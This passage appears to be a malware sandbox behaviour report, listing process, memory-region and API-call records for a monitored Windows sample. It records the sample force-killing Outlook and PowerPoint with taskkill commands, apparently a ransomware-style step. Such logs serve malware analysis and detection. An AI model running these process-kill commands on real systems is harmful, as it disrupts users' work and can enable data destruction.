"67" os_parent_pid = "0x254" cmd_line = "taskkill /f /im outlook.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4916 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4917 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4918 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4919 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 4920 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 4921 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 4922 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 4923 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 4924 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 4925 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 4926 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 4927 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4928 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4929 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4930 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4931 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 4932 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4933 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 4934 start_va = 0x4550000 end_va = 0x455ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 4935 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4936 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4937 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4938 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4939 start_va = 0x4560000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 4940 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4941 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4942 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4943 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4944 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4945 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4946 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4947 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4948 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 4949 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 4950 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4951 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4952 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4953 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4954 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4955 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4956 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4957 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4958 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4959 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4960 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4961 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4962 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 4963 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 4964 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 4965 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 4966 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 4967 start_va = 0x4560000 end_va = 0x463ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 4968 start_va = 0x4720000 end_va = 0x481ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004720000" filename = "" Region: id = 4969 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4970 start_va = 0x4820000 end_va = 0x49a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004820000" filename = "" Region: id = 4971 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4972 start_va = 0x49b0000 end_va = 0x4b30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049b0000" filename = "" Region: id = 4973 start_va = 0x4b40000 end_va = 0x5f3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b40000" filename = "" Region: id = 4974 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4975 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 4976 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 4977 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 4978 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 4979 start_va = 0x5f40000 end_va = 0x6276fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4980 start_va = 0x6280000 end_va = 0x6369fff monitored = 0 entry_point = 0x62bd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4981 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 4982 start_va = 0x4640000 end_va = 0x471ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 4983 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4984 start_va = 0x44c0000 end_va = 0x44c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 4985 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4986 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 4987 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4988 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4989 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4990 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 4991 start_va = 0x44e0000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 4992 start_va = 0x4560000 end_va = 0x459ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 4993 start_va = 0x4630000 end_va = 0x463ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 4994 start_va = 0x45a0000 end_va = 0x45dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 4995 start_va = 0x45e0000 end_va = 0x461ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045e0000" filename = "" Region: id = 4996 start_va = 0x6280000 end_va = 0x62bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006280000" filename = "" Region: id = 4997 start_va = 0x62c0000 end_va = 0x62fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062c0000" filename = "" Region: id = 4998 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4999 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 5000 start_va = 0x4520000 end_va = 0x4525fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004520000" filename = "" Region: id = 5002 start_va = 0x6cba0000 end_va = 0x6cbbbfff monitored = 0 entry_point = 0x6cbaaa90 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 5003 start_va = 0x4520000 end_va = 0x4524fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wmiutils.dll.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\wmiutils.dll.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmiutils.dll.mui") Thread: id = 355 os_tid = 0xb44 Thread: id = 356 os_tid = 0xb04 Thread: id = 357 os_tid = 0x950 Thread: id = 358 os_tid = 0xb88 Thread: id = 359 os_tid = 0x12c4 Process: id = "69" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2e484000" os_pid = "0x2f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im powerpnt.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5004 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5005 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5006 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5007 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5008 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5009 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5010 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5011 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5012 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5013 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5014 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 5015 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5016 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5017 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5018 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5019 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5020 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5021 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5022 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5023 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5024 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5025 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5026 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5027 start_va = 0x460000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 5028 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5029 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5030 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5031 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5032 start_va = 0x460000 end_va = 0x51dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5033 start_va = 0x650000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 5034 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5035 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 5036 start_va = 0x520000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 5037 start_va = 0x750000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 5038 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5039 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5040 start_va = 0x890000 end_va = 0xbc6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 360 os_tid = 0x12bc [0216.301] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0216.301] __set_app_type (_Type=0x1) [0216.301] __p__fmode () returned 0x74974d6c [0216.301] __p__commode () returned 0x74975b1c [0216.301] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0216.302] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0216.302] GetCurrentThreadId () returned 0x12bc [0216.302] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x12bc) returned 0x78 [0216.302] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0216.302] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0216.302] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.310] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.310] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0216.310] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.311] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0216.311] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0216.311] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.311] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0216.311] 